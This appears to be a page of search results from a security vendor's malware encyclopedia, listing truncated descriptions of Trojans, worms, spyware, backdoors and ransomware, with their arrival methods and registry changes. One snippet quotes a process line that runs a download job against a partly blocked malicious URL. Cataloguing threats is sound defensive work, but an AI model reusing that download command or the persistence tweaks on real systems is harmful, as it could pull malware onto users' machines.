Keyword: W2KM_DLOADER.BVFO
47485 Total Search   |   Showing Results : 3581 - 3600
These are legitimate executable files whose code has been altered by another malware to serve as an autostart mechanism for the other malware. It checks whether the main malware is already running by
\Application Data\Microsoft\{GUID}\{GUID}.exe" HKEY_CURRENT_USER\Software\{random} 2 = "{digit}" HKEY_CURRENT_USER\Software\{random} 3 = "{value}" HKEY_CURRENT_USER\Software\{random} 4 = "{value}
This spyware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It executes the downloaded files. As a result,
\ Advanced Hidden = "2" (Note: The default value data of the said registry entry is 2 .) HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Explorer\ Advanced SuperHidden = "0" HKEY_CURRENT_USER
This backdoor arrives via peer-to-peer (P2P) shares. It arrives via removable drives. It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It executes the downloaded files. As a result, malicious
This Backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Backdoor arrives on a system as a
This spyware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It creates folders where it drops its files. It
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This worm arrives on a system as a file
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This worm arrives on a system as a file
" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ TUX\Path 1 = "M35738" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ TUX\Path 2 = "O63636Z" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ TUX\Path 3 = "X51334go" HKEY_LOCAL_MACHINE\SOFTWARE
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
\ Windows\CurrentVersion\Explorer\ Advanced Hidden = "2" (Note: The default value data of the said registry entry is 2 .) HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Explorer\ Advanced
This spyware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This spyware arrives on a system as a
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It drops files as ransom note. Arrival Details This
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It drops files as ransom note. Arrival Details This
This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It drops files as ransom note. Arrival Details This
As of this writing, the said sites are inaccessible. Installation This Trojan adds the following processes: c:\windows\temp\curl.com /transfer jobname http://{BLOCKED}tdriold.com/f64bj/jtrhs.php?l
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a